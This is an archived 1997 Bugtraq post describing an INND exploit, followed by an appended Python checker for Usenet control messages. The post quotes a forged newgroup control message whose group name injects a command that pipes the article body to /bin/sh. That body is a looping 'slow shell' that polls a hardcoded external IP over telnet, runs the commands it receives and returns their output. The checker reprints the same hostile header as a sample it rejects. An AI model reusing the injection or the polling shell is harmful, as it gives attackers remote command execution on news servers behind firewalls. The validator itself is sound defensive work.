[4185] in bugtraq
INND exploit Works behind firewalls
daemon@ATHENA.MIT.EDU (Rikhardur Egilsson)
Tue Mar 18 11:08:08 1997
Date: Tue, 18 Mar 1997 09:25:43 +0000
Reply-To: Rikhardur Egilsson <k97161@SKYRR.IS>
From: Rikhardur Egilsson <k97161@SKYRR.IS>
To: BUGTRAQ@NETSPACE.ORG
A part of the first innd exploit was a remote shell that would be
effective behind firewalls.
Along with a replaced 'telnetd' on the attacker's computer, this can be
used as a "slow shell" to execute commands on a target behind a firewall.
Enjoy the reading.
#################### START SLOW SHELL #################################
Path: skyrr.is!news.isnet.is!newsfeed.sunet.se!news99.sunet.se!newsfeed.luth.se!news.luth.se!eru.mt.luth.se!news.algonet.se!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9020@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12
#+
while :; do
IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
if [ X"$IN" != X"$OIN" ]; then
(/bin/sleep 2; eval "$IN" 2>&1) |
/bin/telnet 193.12.106.100 23 >/dev/null 2>&1
OIN=$IN
fi
sleep 30
done
#-
#################### END SLOW SHELL #################################
--
rikardur@skyrr.is - Skyrr Ltd - Iceland Information Management
Rikhardur Egilsson - System Programmer - UNIX Admin - Tel : +354-5695100
Armuli 2 - IS-108 Reykjavik - Iceland - Fax : +354-5695251
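
A defensive check for the kind of control message quoted above, as an added example that is not part of the original post and is not INN's own code: it validates the group-name argument of `newgroup`/`rmgroup` before anything passes it to a shell. The function name `check_control`, the name grammar, the metacharacter set and the sample articles are assumptions made for this example.

```python
import re
from email.parser import HeaderParser

# Assumed conservative grammar for this example: two or more dot-separated
# components made of lowercase letters, digits, '+', '-' and '_'.
GROUP_RE = re.compile(r"[a-z0-9][a-z0-9+_-]*(?:\.[a-z0-9][a-z0-9+_-]*)+")
# Characters that must never appear in a group name handed to a shell.
SHELL_META = set("`$|;&<>(){}'\"\\*?[]!~:")

def check_control(raw_article):
    """Return (verdict, reasons) for one article's control command."""
    msg = HeaderParser().parsestr(raw_article)
    control = msg.get("Control")
    if control is None and msg.get("Subject", "").startswith("cmsg "):
        control = msg["Subject"][5:]      # legacy "Subject: cmsg ..." form
    if control is None:
        return "not-control", []
    words = control.split()
    if not words or words[0] not in ("newgroup", "rmgroup"):
        return "unchecked", []            # other commands are out of scope here
    if len(words) < 2:
        return "reject", ["missing group name"]
    group, extra, reasons = words[1], words[2:], []
    bad = sorted(SHELL_META.intersection(group))
    if bad:
        reasons.append("shell metacharacters in group name: " + " ".join(bad))
    if not GROUP_RE.fullmatch(group):
        reasons.append("group name fails newsgroup grammar")
    allowed_extra = ([], ["moderated"]) if words[0] == "newgroup" else ([],)
    if extra not in allowed_extra:
        reasons.append("unexpected trailing arguments")
    return ("reject" if reasons else "accept"), reasons

# Constructed sample articles; only the headers matter to the check.
BENIGN = ("From: admin@example.org\n"
          "Control: newgroup comp.lang.example moderated\n\nbody\n")
HOSTILE = ("From: someone@example.org\n"
           "Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh`"
           " moderated\n\n#+\n(body elided)\n#-\n")

if __name__ == "__main__":
    for name, article in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(name, check_control(article))
```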